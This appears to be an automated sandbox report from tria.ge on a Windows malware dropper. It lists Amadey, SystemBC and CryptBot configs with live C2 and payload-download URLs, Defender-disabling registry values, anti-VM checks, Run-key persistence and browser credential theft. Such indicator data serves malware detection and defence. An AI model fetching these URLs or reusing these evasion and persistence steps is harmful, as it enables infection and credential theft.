Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
20/02/2025, 04:52
Static task
static1
Behavioral task
behavioral1
Sample
f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe
Resource
win10v2004-20250217-en
General
-
Target
f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe
-
Size
2.1MB
-
MD5
34a6ac1fec0b84dac8301a70322231df
-
SHA1
8d9384ae55556cb5a5283a060cf8145a6b37d067
-
SHA256
f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0
-
SHA512
09a422872484ef19a1fc72371b08affd781c9571e96fc293a79df829b62b5188fa9124515e7384e652f333b42f097b6f9044ce37e359d8f9085edf06d28ae567
-
SSDEEP
49152:YS2K2eIrOz0Vv8u3ANStWoh1nZkzmGY2C4oSqn:YS2K2eIrOAZ8u3AE0ovZkK514Lq
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
systembc
cobolrationumelawrtewarms.co:4001
93.186.202.3:4001
-
dns
5.132.191.104
ns1.vic.au.dns.opennic.glue
ns2.vic.au.dns.opennic.glue
Extracted
cryptbot
http://home.fivenn5sr.top/DoDOGDWnPbpMwhmjDvNk17
Signatures
-
Amadey family
-
Cryptbot family
-
Detects CryptBot payload 1 IoCs
CryptBot is a C++ stealer distributed widely in bundle with other software.
resource yara_rule behavioral2/memory/820-398-0x0000000069CC0000-0x000000006A71B000-memory.dmp family_cryptbot_v3 -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/436-316-0x0000000000F30000-0x0000000001386000-memory.dmp healer behavioral2/memory/436-315-0x0000000000F30000-0x0000000001386000-memory.dmp healer behavioral2/memory/436-377-0x0000000000F30000-0x0000000001386000-memory.dmp healer -
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE -
Systembc family
-
Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF f8fc74dfc3.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 18 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d2YQIJa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 468c3dbc43.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ kdMujZh.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ehjl.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 47fce15d5f.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1c29bfe45e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3omTNLZ.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f8fc74dfc3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1c29bfe45e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 6537eca44e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0d60014756.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempMWPZZDXKGV107ICWUELKRW8PLUP4WTXF.EXE -
Blocklisted process makes network request 61 IoCs
flow pid Process 76 2168 powershell.exe 84 1060 powershell.exe 186 3024 powershell.exe 189 3024 powershell.exe 219 3024 powershell.exe 226 3024 powershell.exe 237 3024 powershell.exe 243 3024 powershell.exe 250 3024 powershell.exe 255 3024 powershell.exe 261 3024 powershell.exe 266 3024 powershell.exe 269 3024 powershell.exe 271 3024 powershell.exe 272 3024 powershell.exe 273 3024 powershell.exe 274 3024 powershell.exe 275 3024 powershell.exe 276 3024 powershell.exe 277 3024 powershell.exe 278 3024 powershell.exe 279 3024 powershell.exe 288 3024 powershell.exe 289 3024 powershell.exe 290 3024 powershell.exe 292 3024 powershell.exe 293 3024 powershell.exe 294 3024 powershell.exe 295 3024 powershell.exe 296 3024 powershell.exe 297 3024 powershell.exe 301 3024 powershell.exe 302 3024 powershell.exe 303 3024 powershell.exe 305 3024 powershell.exe 308 3024 powershell.exe 309 3024 powershell.exe 311 3024 powershell.exe 312 5676 powershell.exe 313 3024 powershell.exe 314 3024 powershell.exe 316 3024 powershell.exe 318 3024 powershell.exe 356 3024 powershell.exe 389 3024 powershell.exe 401 3024 powershell.exe 410 3024 powershell.exe 413 3024 powershell.exe 414 3024 powershell.exe 419 3024 powershell.exe 423 3024 powershell.exe 424 3024 powershell.exe 428 3024 powershell.exe 430 3024 powershell.exe 431 3024 powershell.exe 432 3024 powershell.exe 433 3024 powershell.exe 435 3024 powershell.exe 438 3024 powershell.exe 440 3024 powershell.exe 442 3024 powershell.exe -
pid Process 4212 powershell.exe 2272 powershell.exe 3904 powershell.exe 6012 powershell.exe 5260 powershell.exe 5676 powershell.exe 2168 powershell.exe 1060 powershell.exe -
Detects GOST tunneling tool 1 IoCs
A simple tunneling tool written in Golang
resource yara_rule behavioral2/files/0x0033000000023c47-54.dat Gost -
Downloads MZ/PE file 29 IoCs
flow pid Process 84 1060 powershell.exe 163 1224 futors.exe 270 1224 futors.exe 312 5676 powershell.exe 17 1340 skotes.exe 17 1340 skotes.exe 17 1340 skotes.exe 17 1340 skotes.exe 17 1340 skotes.exe 17 1340 skotes.exe 17 1340 skotes.exe 17 1340 skotes.exe 17 1340 skotes.exe 17 1340 skotes.exe 17 1340 skotes.exe 17 1340 skotes.exe 17 1340 skotes.exe 17 1340 skotes.exe 17 1340 skotes.exe 59 1340 skotes.exe 59 1340 skotes.exe 59 1340 skotes.exe 59 1340 skotes.exe 59 1340 skotes.exe 78 1224 futors.exe 78 1224 futors.exe 78 1224 futors.exe 78 1224 futors.exe 76 2168 powershell.exe -
Uses browser remote debugging 2 TTPs 8 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 4856 chrome.exe 1780 chrome.exe 2364 chrome.exe 5316 chrome.exe 2428 chrome.exe 5168 chrome.exe 2516 chrome.exe 4868 chrome.exe -
Checks BIOS information in registry 2 TTPs 36 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f8fc74dfc3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1c29bfe45e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ehjl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0d60014756.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1c29bfe45e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1c29bfe45e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempMWPZZDXKGV107ICWUELKRW8PLUP4WTXF.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion kdMujZh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 47fce15d5f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 47fce15d5f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6537eca44e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3omTNLZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0d60014756.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion kdMujZh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ehjl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6537eca44e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 468c3dbc43.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1c29bfe45e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3omTNLZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempMWPZZDXKGV107ICWUELKRW8PLUP4WTXF.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f8fc74dfc3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 468c3dbc43.exe -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation amnew.exe Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation futors.exe Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation f8fc74dfc3.exe Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation mshta.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat powershell.exe -
Executes dropped EXE 61 IoCs
pid Process 1340 skotes.exe 3268 3omTNLZ.exe 4796 dzvh4HC.exe 3904 YMci4Rc.exe 4772 YMci4Rc.exe 1456 9aiiMOQ.exe 1972 9aiiMOQ.exe 3884 NL58452.exe 1616 NL58452.exe 1816 skotes.exe 1384 f3Ypd8O.exe 3256 f3Ypd8O.exe 1940 kdMujZh.exe 4024 amnew.exe 1224 futors.exe 1584 221457afdd.exe 1384 ehjl.exe 436 TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE 3976 483d2fa8a0d53818306efeb32d3.exe 820 f8fc74dfc3.exe 2140 47fce15d5f.exe 4864 6537eca44e.exe 4572 trano1221.exe 4588 trano1221.exe 3388 Bjkm5hE.exe 3900 Bjkm5hE.exe 1632 NL58452.exe 3808 NL58452.exe 4460 con12312211221.exe 5216 con12312211221.exe 5412 dzvh4HC.exe 5948 monthdragon.exe 784 monthdragon.exe 5568 7aencsM.exe 1616 7aencsM.exe 5224 12321321.exe 5648 f3Ypd8O.exe 2856 f3Ypd8O.exe 1056 skotes.exe 5812 futors.exe 1788 alex12112.exe 6088 alex12112.exe 5028 alex12112.exe 5124 alex12112.exe 704 alex12112.exe 1780 d2YQIJa.exe 2864 9aiiMOQ.exe 5780 9aiiMOQ.exe 3900 fher.exe 812 fher.exe 4304 DTQCxXZ.exe 6096 468c3dbc43.exe 5644 0d60014756.exe 1612 service123.exe 780 1c29bfe45e.exe 5468 1c29bfe45e.exe 5148 0b0234d421.exe 4320 92c7e4ad44.exe 5144 TempMWPZZDXKGV107ICWUELKRW8PLUP4WTXF.EXE 5516 17ac8e74ea.exe 5244 ce41c0292a.exe -
Identifies Wine through registry keys 2 TTPs 18 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine d2YQIJa.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 468c3dbc43.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 0d60014756.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine ehjl.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 1c29bfe45e.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine kdMujZh.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine f8fc74dfc3.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 47fce15d5f.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 6537eca44e.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 1c29bfe45e.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine TempMWPZZDXKGV107ICWUELKRW8PLUP4WTXF.EXE Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 3omTNLZ.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE -
Loads dropped DLL 31 IoCs
pid Process 4588 trano1221.exe 4588 trano1221.exe 4588 trano1221.exe 4588 trano1221.exe 4588 trano1221.exe 4588 trano1221.exe 4588 trano1221.exe 4588 trano1221.exe 4588 trano1221.exe 4588 trano1221.exe 4588 trano1221.exe 4588 trano1221.exe 4588 trano1221.exe 4588 trano1221.exe 4588 trano1221.exe 4588 trano1221.exe 4588 trano1221.exe 4588 trano1221.exe 4588 trano1221.exe 4588 trano1221.exe 4588 trano1221.exe 4588 trano1221.exe 4588 trano1221.exe 4588 trano1221.exe 4588 trano1221.exe 4588 trano1221.exe 4588 trano1221.exe 4588 trano1221.exe 4588 trano1221.exe 4588 trano1221.exe 1612 service123.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE -
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0b0234d421.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1088727001\\0b0234d421.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\92c7e4ad44.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1088728001\\92c7e4ad44.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\221457afdd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1088694101\\221457afdd.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1088695021\\am_no.cmd" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\468c3dbc43.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10009190101\\468c3dbc43.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0d60014756.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1088725001\\0d60014756.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1c29bfe45e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1088726001\\1c29bfe45e.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1c29bfe45e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10009200101\\1c29bfe45e.exe" futors.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0007000000023daf-209.dat autoit_exe behavioral2/files/0x000a000000023e0c-1186.dat autoit_exe behavioral2/files/0x000a000000023e12-1207.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 18 IoCs
pid Process 1228 f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe 1340 skotes.exe 3268 3omTNLZ.exe 1816 skotes.exe 1940 kdMujZh.exe 1384 ehjl.exe 436 TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE 3976 483d2fa8a0d53818306efeb32d3.exe 820 f8fc74dfc3.exe 2140 47fce15d5f.exe 4864 6537eca44e.exe 1056 skotes.exe 1780 d2YQIJa.exe 6096 468c3dbc43.exe 5644 0d60014756.exe 780 1c29bfe45e.exe 5468 1c29bfe45e.exe 5144 TempMWPZZDXKGV107ICWUELKRW8PLUP4WTXF.EXE -
Suspicious use of SetThreadContext 14 IoCs
description pid Process procid_target PID 3904 set thread context of 4772 3904 YMci4Rc.exe 98 PID 1456 set thread context of 1972 1456 9aiiMOQ.exe 103 PID 3884 set thread context of 1616 3884 NL58452.exe 107 PID 1384 set thread context of 3256 1384 f3Ypd8O.exe 112 PID 3388 set thread context of 3900 3388 Bjkm5hE.exe 151 PID 1632 set thread context of 3808 1632 NL58452.exe 157 PID 4460 set thread context of 5216 4460 con12312211221.exe 166 PID 5948 set thread context of 784 5948 monthdragon.exe 176 PID 5568 set thread context of 1616 5568 7aencsM.exe 180 PID 5648 set thread context of 2856 5648 f3Ypd8O.exe 191 PID 1788 set thread context of 704 1788 alex12112.exe 211 PID 2864 set thread context of 5780 2864 9aiiMOQ.exe 217 PID 3900 set thread context of 812 3900 fher.exe 222 PID 5468 set thread context of 5180 5468 1c29bfe45e.exe 265 -
resource yara_rule behavioral2/files/0x0007000000023e3e-563.dat upx behavioral2/files/0x0007000000023df0-576.dat upx behavioral2/memory/4588-582-0x00007FFD5E620000-0x00007FFD5E64D000-memory.dmp upx behavioral2/memory/4588-589-0x00007FFD5E4C0000-0x00007FFD5E4F3000-memory.dmp upx behavioral2/memory/4588-590-0x00007FFD4E130000-0x00007FFD4E650000-memory.dmp upx behavioral2/memory/4588-591-0x00007FFD5E070000-0x00007FFD5E13D000-memory.dmp upx behavioral2/memory/4588-592-0x00007FFD4E060000-0x00007FFD4E12F000-memory.dmp upx behavioral2/memory/4588-586-0x00007FFD60430000-0x00007FFD6043D000-memory.dmp upx behavioral2/memory/4588-584-0x00007FFD5E500000-0x00007FFD5E536000-memory.dmp upx behavioral2/memory/4588-581-0x00007FFD61FB0000-0x00007FFD61FC9000-memory.dmp upx behavioral2/memory/4588-580-0x00007FFD61F80000-0x00007FFD61F99000-memory.dmp upx behavioral2/memory/4588-579-0x00007FFD61FA0000-0x00007FFD61FAD000-memory.dmp upx behavioral2/memory/4588-578-0x00007FFD61FD0000-0x00007FFD61FDF000-memory.dmp upx behavioral2/memory/4588-577-0x00007FFD62290000-0x00007FFD622B3000-memory.dmp upx behavioral2/memory/4588-569-0x00007FFD4E650000-0x00007FFD4EC39000-memory.dmp upx behavioral2/memory/4588-594-0x00007FFD4E650000-0x00007FFD4EC39000-memory.dmp upx behavioral2/memory/4588-596-0x00007FFD5E4A0000-0x00007FFD5E4B4000-memory.dmp upx behavioral2/memory/4588-598-0x00007FFD60420000-0x00007FFD6042B000-memory.dmp upx behavioral2/memory/4588-599-0x00007FFD5E210000-0x00007FFD5E236000-memory.dmp upx behavioral2/memory/4588-601-0x00007FFD4DDF0000-0x00007FFD4DF0C000-memory.dmp upx behavioral2/memory/4588-600-0x00007FFD5E620000-0x00007FFD5E64D000-memory.dmp upx behavioral2/memory/4588-597-0x00007FFD61FB0000-0x00007FFD61FC9000-memory.dmp upx behavioral2/memory/4588-595-0x00007FFD5E3A0000-0x00007FFD5E427000-memory.dmp upx behavioral2/memory/4588-611-0x00007FFD5A0E0000-0x00007FFD5A123000-memory.dmp upx behavioral2/memory/4588-613-0x00007FFD5E1F0000-0x00007FFD5E202000-memory.dmp upx behavioral2/memory/4588-612-0x00007FFD5E4C0000-0x00007FFD5E4F3000-memory.dmp upx behavioral2/memory/4588-630-0x00007FFD5A0B0000-0x00007FFD5A0DE000-memory.dmp upx behavioral2/memory/4588-629-0x00007FFD4E060000-0x00007FFD4E12F000-memory.dmp upx behavioral2/memory/4588-661-0x00007FFD55330000-0x00007FFD5535B000-memory.dmp upx behavioral2/memory/4588-628-0x00007FFD54CE0000-0x00007FFD54D9C000-memory.dmp upx behavioral2/memory/4588-627-0x00007FFD4DBA0000-0x00007FFD4DDE9000-memory.dmp upx behavioral2/memory/4588-626-0x00007FFD5DAF0000-0x00007FFD5DB14000-memory.dmp upx behavioral2/memory/4588-625-0x00007FFD5E070000-0x00007FFD5E13D000-memory.dmp upx behavioral2/memory/4588-624-0x00007FFD4E130000-0x00007FFD4E650000-memory.dmp upx behavioral2/memory/4588-696-0x00007FFD5E070000-0x00007FFD5E13D000-memory.dmp upx behavioral2/memory/4588-704-0x00007FFD5E1F0000-0x00007FFD5E202000-memory.dmp upx behavioral2/memory/4588-717-0x00007FFD55330000-0x00007FFD5535B000-memory.dmp upx behavioral2/memory/4588-716-0x00007FFD4DBA0000-0x00007FFD4DDE9000-memory.dmp upx behavioral2/memory/4588-715-0x00007FFD54CE0000-0x00007FFD54D9C000-memory.dmp upx behavioral2/memory/4588-714-0x00007FFD5A0B0000-0x00007FFD5A0DE000-memory.dmp upx behavioral2/memory/4588-713-0x00007FFD5DAF0000-0x00007FFD5DB14000-memory.dmp upx behavioral2/memory/4588-703-0x00007FFD5A0E0000-0x00007FFD5A123000-memory.dmp upx behavioral2/memory/4588-702-0x00007FFD4DDF0000-0x00007FFD4DF0C000-memory.dmp upx behavioral2/memory/4588-701-0x00007FFD5E210000-0x00007FFD5E236000-memory.dmp upx behavioral2/memory/4588-700-0x00007FFD60420000-0x00007FFD6042B000-memory.dmp upx behavioral2/memory/4588-699-0x00007FFD5E4A0000-0x00007FFD5E4B4000-memory.dmp upx behavioral2/memory/4588-698-0x00007FFD5E3A0000-0x00007FFD5E427000-memory.dmp upx behavioral2/memory/4588-697-0x00007FFD4E060000-0x00007FFD4E12F000-memory.dmp upx 